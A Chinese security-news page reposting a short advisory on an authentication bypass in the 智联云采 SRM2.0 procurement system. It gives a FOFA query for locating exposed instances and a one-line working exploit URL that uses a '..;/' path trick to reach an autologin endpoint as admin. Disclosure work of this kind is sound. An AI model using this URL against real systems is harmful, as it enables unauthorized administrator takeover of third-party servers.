欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
设备默认密码查询
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全漏洞正文

智联云采SRM2.0存在身份认证绕过漏洞

2024年9月26日11:27:02评论28 views字数 197阅读0分39秒阅读模式

漏洞描述

由于智联云采SRM2.0存在身份认证绕过漏洞，导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台。

资产测绘

FOFA：title=="SRM 2.0"

漏洞复现

http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

原文始发于微信公众号（漏洞文库）：【漏洞复现】智联云采SRM2.0存在身份认证绕过漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

https://cn-sec.com/archives/3123307.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞复现
认证绕过漏洞
身份认证绕过漏洞
智联云采

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

本文由 admin 发表于 2024年9月26日11:27:02
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
智联云采SRM2.0存在身份认证绕过漏洞https://cn-sec.com/archives/3123307.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

记一次bypass 403打点

CVE-2024-20017 的四种利用方式

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

Next.js中间件权限绕过漏洞 CVE-2025-29927

Langflow code接口存在远程代码执行漏洞CVE-2025-3248 附POC

Vite import存在任意文件读取漏洞CVE-2025-31125 附POC

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

厂商·招聘|广告 [长期有效]

[深信服-深蓝攻防实验室]关于红队成长的分享【招聘内推】 06/20 CN-SEC站务

本类热门文章

TurboGate邮件网关漏洞合集 49,214 views 0
斗鱼TV两处功能平行权限漏洞 16,939 views 0
666个政府网站sql注入漏洞的注入点 15,282 views 0
帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757 8,459 views 1
史上最强搜索神器章鱼搜索xss跨站 7,696 views 0
【漏洞预警】奇安信vpn存在未授权管理用户遍历及任意账号密码修改，已复现 7,246 views 3
通用型正方教务（通杀各版本）存在注入（不需登陆）+获得webshell+提权内网漫游 6,845 views 0

安全漏洞

Argo Events权限管理不当漏洞 04/16 2 views
Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727) 04/16 3 views
Apache Roller 漏洞让攻击者获得未经授权的访问 04/16 4 views
Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727） 04/16 6 views
Apache Roller 未经授权的访问漏洞 04/16 3 views
Gladinet漏洞CVE-2025-30406遭在野利用 04/16 6 views
安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞 04/16 10 views
Microsoft Edge信息泄露漏洞(CVE-2025-29834) 04/16 23 views
【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406） 04/15 33 views
【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108) 04/15 26 views

热门标签

shellcode com php 漏洞预警 java xss 人工智能注入漏洞 sql注入信息安全攻击者远程代码执行漏洞奇安信勒索软件 sql注入漏洞信息收集 http 身份验证网络 ctf burp 攻击 windows 网络攻击 linux 密码反序列化 nmap 数据泄露 ip https cve 文件漏洞漏洞复现黑客服务器数据安全安全恶意软件 payload webshell web microsoft cwe 渗透测试 rce python 网络安全工具

最新文章

Oracle 2025年4月补丁日多个安全漏洞 04/16 0 views
Argo Events权限管理不当漏洞 04/16 2 views
Web3 安全入门避坑指南｜剪贴板安全 04/16 1 views
CS4.9 PWN3 破解版分析 04/16 3 views
在线论坛 4chan 在遭受重大黑客攻击后被迫关闭 04/16 2 views
Hunters International转型：放弃加密勒索，专攻数据窃取与敲诈 04/16 4 views
【万字详细】PHP与ThinkPHP框架代码审计综合技巧 04/16 1 views

大家喜欢

669个大学网站都有注入点 4305/01
揭秘CVE-2024-21111：Oracle VirtualBox 本地权限提升漏洞 2806/12
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章141281 留言 691 访客21397522

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章141281
分类47
标签151514
留言691
链接0
浏览21397522
今日91
本周276
运行3305 天
更新2025-4-16

Copyright © CN-SEC中文网版权所有.

微信

在线工具
娱乐一下
在线工具集
DNSlog

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

8888